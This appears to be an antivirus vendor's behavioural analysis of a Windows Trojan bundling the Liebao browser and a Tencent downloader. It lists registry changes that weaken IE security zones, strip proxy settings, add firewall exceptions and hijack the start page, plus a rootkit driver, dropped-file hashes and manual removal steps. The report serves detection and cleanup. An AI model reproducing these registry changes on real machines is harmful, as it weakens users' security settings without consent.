[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\tencentdl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\DownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"
[HKCR\DownloadProxy.Downloader.1\CLSID]
"(Default)" = "{70DE12EA-79F4-46bc-9812-86DB50A2FD64}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\DownloadProxy.Downloader]
"(Default)" = "Downloader Class"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\LocalServer32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\tencentdl.exe"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\VersionIndependentProgID]
"(Default)" = "DownloadProxy.Downloader"
[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\DownloadProxy.Downloader\CurVer]
"(Default)" = "DownloadProxy.Downloader.1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\ProgID]
"(Default)" = "DownloadProxy.Downloader.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 83 76 56 7D 6B AB BB 78 B0 56 59 90 A3 B3 2A"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\DownloadProxy.Downloader\CLSID]
"(Default)" = "{70DE12EA-79F4-46bc-9812-86DB50A2FD64}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
The Trojan modifies IE security-zone settings so that all local web-nodes with no dots in their names (which do not belong to any zone) are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process netsh.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 3F 4A 72 9A DC FA 0A 01 00 1C 3E 3C 8A 6E 11"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the Windows Firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Tencent\QQDownload\122]
"Tencentdl.exe" = "%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe:*:Enabled:腾讯产品下载组件"
The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Tencent\QQDownload\122]
"Tencentdl.exe" = "%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe:*:Enabled:腾讯产品下载组件"
The process ÊÖ»úºäÕ¨»ú.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 28 CD B6 37 93 88 58 0C C4 FB 54 CE C4 7E B1"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The process Tencentdl.exe:848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 8A 46 BD AD 74 4B 18 7B 8D 9E 0F 64 E3 B4 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\tencent\qqdownload\122]
"Tencentdl.exe" = "腾讯高速下载引擎"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process 0liebao.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 5E 11 0A 94 ED 82 8C 63 55 9A F5 D3 84 B6 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp]
"setup.bat" = "setup"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process knbcenter.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 A6 0F C5 90 88 5E B1 BD 69 7A B6 B3 AC 3C BB"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"ImagePath" = "%Program Files%\liebao\4.5.34.6725\KNBCenter.exe"
The process knbcenter.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 40 9D 2C 07 E4 E8 E4 43 9E CD 86 9F D7 31 A8"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"Description" = "猎豹浏览器主动防御(BIPS)及安全组件更新服务,帮助用户防御最新木马。"
The process reg.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 5F 5F B3 0D 3F F8 A8 6E B0 5B 81 DC CB 5B 53"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.duba.com/?un_4_413286"
The process reg.exe:708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C1 6E 85 4B FB D3 D0 94 EE 9F FA 4A 47 37 98"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.duba.com/?un_4_413286"
The process skinupdater.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 19 E1 6D DD B4 03 1E 75 C0 04 D6 8C 8B 13 D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Dropped PE files
MD5 | File path |
---|---|
2aa21c79b5dd2b5152d49f5825c87388 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0liebao.exe |
143f817034ae745c8225c424fa944f43 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp\down_s_66_82685.exe |
b209163d6c82ef393c15c02ed206bbc4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ÊÖ»úºäÕ¨»ú.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\KNBDrv.sys", the Trojan monitors process creation and termination by installing a process notification callback.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ksbinstaller_66_82685.exe:984
%original file name%.exe:1264
KNBCenter.exe:1240
regsvr32.exe:1536
liebao.exe:1780
liebao.exe:516
down_s_66_82685.exe:1988
ping.exe:972
wuauclt.exe:924
tencentdl.exe:1932
netsh.exe:320
Tencentdl.exe:848
0liebao.exe:1948
knbcenter.exe:2036
knbcenter.exe:916
reg.exe:1976
reg.exe:708
skinupdater.exe:348
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (586 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearchb.dat (6341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztma002d.psg (74 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.ini (172 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbpolicy.dll (15628 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\alipay.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\baifubao.png (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\atxhlp.dat (21 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\xinput1_3.dll (880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kdumprep.exe (7541 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\毒霸网址大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3002.ksg (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseutil.dll (2976 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj021204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0005.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\unknown.ksg (422 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\libvideo.dat (15 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_unsafe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\bc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\vinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\spdb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepbb002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaevname.dat (108 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksedset.ini (425 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepc0002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7001.vsg (265 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\修复浏览器.lnk (748 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome.dll (503987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0002.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\cdeploy.dat (11 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Localauto.db (40 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\manifest.json (2 bytes)
%System%\drivers\ksapi.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\KNBDrv64.sys (1543 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\99bill.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Install.bat (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\npaliedit.dll (2836 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gare.db (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj011204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb7001.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3001.ksg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Extract.dll (3773 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\incognito.dat (1650 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepba000.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7999.vsg (266 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kmsgsvc.dll (8953 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac002.ksg (3702 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\skin_thumbnail.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\karchive.dat (101 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6001.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\boc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaext2.dat (85 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\skinupdater.exe (21987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\autofilljs2.dat (89 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\FixBrowser.exe (18429 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adfilter.dat (131 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0002.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kui.pak (30655 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvba012.vsg (273 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\en-US.pak (195 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBrowserUpgrade2.dll (2787 bytes)
%Documents and Settings%\%current user%\Desktop\猎豹安全浏览器.lnk (634 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.fsg (120 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksecfg.ini (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\psbc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zema0007.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\befc2009.psg (82 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmb0014.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdet2.dll (10359 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\p1tl.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\mousegesturelib.xml (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\卸载猎豹安全浏览器.lnk (726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\newtab_img2.zip (7972 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\nologin.dat (897 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw2.dat (772 bytes)
%Program Files%\liebao\2014522163323984_1\browserpacket.xml (178 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_touch_100_percent.pak (6399 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbctrl.dll (3109 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ManualUpgrade.exe (9449 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\resources.pak (45687 bytes)
%Documents and Settings%\%current user%\Desktop\毒霸网址大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\config\kseeat.cfg (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (238 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\trackers.dat (1760 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.sys (712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\ceb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences_resintall (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay_site.dat (19 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\tn.dat (1704 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.dat (327 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\AllSigns.ini (3 bytes)
